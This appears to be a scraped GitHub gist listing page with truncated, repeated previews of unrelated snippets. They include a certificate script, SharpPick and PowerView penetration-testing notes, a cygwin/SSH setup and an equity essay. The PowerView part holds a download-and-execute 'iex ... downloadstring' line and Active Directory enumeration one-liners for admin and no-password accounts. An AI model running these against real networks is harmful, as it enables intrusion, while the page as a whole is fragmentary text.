Mark Baseggio blark

## gencert.py
#! /usr/bin/python

"""
    This simple script makes it easy to create server certificates
    that are signed by your own Certificate Authority.

    Mostly, this script just automates the workflow explained
    in http://www.tc.umn.edu/~brams006/selfsign.html.

    Before using this script, you'll need to create a private

## forcefully_remove_mdm_1013.sh
#!/bin/bash
# Seriously there still apparently aren't enough warning labels
# If you don't understand the consequences don't do it
# ################
# #### May cause 10.13.2+ machines that were DEP-enrolled to not be considered as such
# ################
# but really, you shouldn't do this
# one local user enabled for MDM come on apple
#  ¯\_(ツ)_/¯

## SharpPick.cs
/*
 * SharpPick aka InexorablePoSH
 * Description: Application to load and run powershell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 *
 * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
 */

## async_dns.c
#include <ares.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <string.h>
#include <ctype.h>

## krb5_ccache.py
#!/usr/bin/env python
##############################################################################
#
# Copyright (C) Zenoss, Inc. 2013, all rights reserved.
#
# This content is made available according to terms specified in
# License.zenoss under the directory where your Zenoss product is installed.
#
##############################################################################

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## PowerViewFirstChecks.ps1
# Download and invoke PowerView:
iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

# All admin users of default domain:
$filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'

# All enabled users (including admins) with no-password setting
$filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count)

## PowerView-2.0-tricks.ps1
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local

# retrieve all the computers a GPP password applies to

## wincore-cygwin
echo Enabling firewall rule...
netsh advfirewall firewall add rule name="SSHd" dir=in action=allow protocol=TCP localport=22
echo Downloading cygwin installer...
$client = new-object System.Net.WebClient
$client.DownloadFile( "https://www.cygwin.com/setup-x86_64.exe", "c:\windows\temp\setup-x86_64.exe" )
.\Windows\Temp\setup-x86_64.exe

## what-i-wish-id-known-about-equity-before-joining-a-unicorn.md

      
        
          
            
              
              1 file
            
          
          
            
              
              0 forks
            
          
          
            
              
              0 comments
            
          
          
            
              
              0 stars
            
          
        
        
          
              
          
          
            
                blark
                / what-i-wish-id-known-about-equity-before-joining-a-unicorn.md
            
            
              Created
              January 19, 2017 21:41
                — forked from yossorion/what-i-wish-id-known-about-equity-before-joining-a-unicorn.md
            
              
                What I Wish I'd Known About Equity Before Joining A Unicorn
              
          
        
      
        
  
      
    What I Wish I'd Known About Equity Before Joining A Unicorn

Disclaimer: This piece is written anonymously. The names of a few
particular companies are mentioned, but as common examples only.
This is a short write-up on things that I wish I'd known and
considered before joining a private company (aka startup, aka unicorn
in some cases). I'm not trying to make the case that you should
never join a private company, but the power imbalance between
founder and employee is extreme, and that potential candidates would
	#! /usr/bin/python

	"""
	This simple script makes it easy to create server certificates
	that are signed by your own Certificate Authority.

	Mostly, this script just automates the workflow explained
	in http://www.tc.umn.edu/~brams006/selfsign.html.

	Before using this script, you'll need to create a private
	#!/bin/bash
	# Seriously there still apparently aren't enough warning labels
	# If you don't understand the consequences don't do it
	# ################
	# #### May cause 10.13.2+ machines that were DEP-enrolled to not be considered as such
	# ################
	# but really, you shouldn't do this
	# one local user enabled for MDM come on apple
	# ¯\_(ツ)_/¯
	/*
	* SharpPick aka InexorablePoSH
	* Description: Application to load and run powershell code via the .NET assemblies
	* License: 3-Clause BSD License. See Veil PowerTools Project
	*
	* This application is part of Veil PowerTools, a collection of offensive PowerShell
	* capabilities. Hope they help!
	*
	* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
	*/
	#include <ares.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <sys/socket.h>
	#include <arpa/inet.h>
	#include <netinet/in.h>
	#include <netdb.h>
	#include <stdarg.h>
	#include <string.h>
	#include <ctype.h>
	#!/usr/bin/env python
	##############################################################################
	#
	# Copyright (C) Zenoss, Inc. 2013, all rights reserved.
	#
	# This content is made available according to terms specified in
	# License.zenoss under the directory where your Zenoss product is installed.
	#
	##############################################################################
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	# Download and invoke PowerView:
	iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

	# All admin users of default domain:
	$filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out \| select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname \| sort lastlogontimestamp \| ft -wrap -autosize >> $filename'.txt'

	# All enabled users (including admins) with no-password setting
	$filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count)
	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	Get-NetLocalGroup -Recurse SERVER.domain.local

	# retrieve all the computers a GPP password applies to
	echo Enabling firewall rule...
	netsh advfirewall firewall add rule name="SSHd" dir=in action=allow protocol=TCP localport=22
	echo Downloading cygwin installer...
	$client = new-object System.Net.WebClient
	$client.DownloadFile( "https://www.cygwin.com/setup-x86_64.exe", "c:\windows\temp\setup-x86_64.exe" )
	.\Windows\Temp\setup-x86_64.exe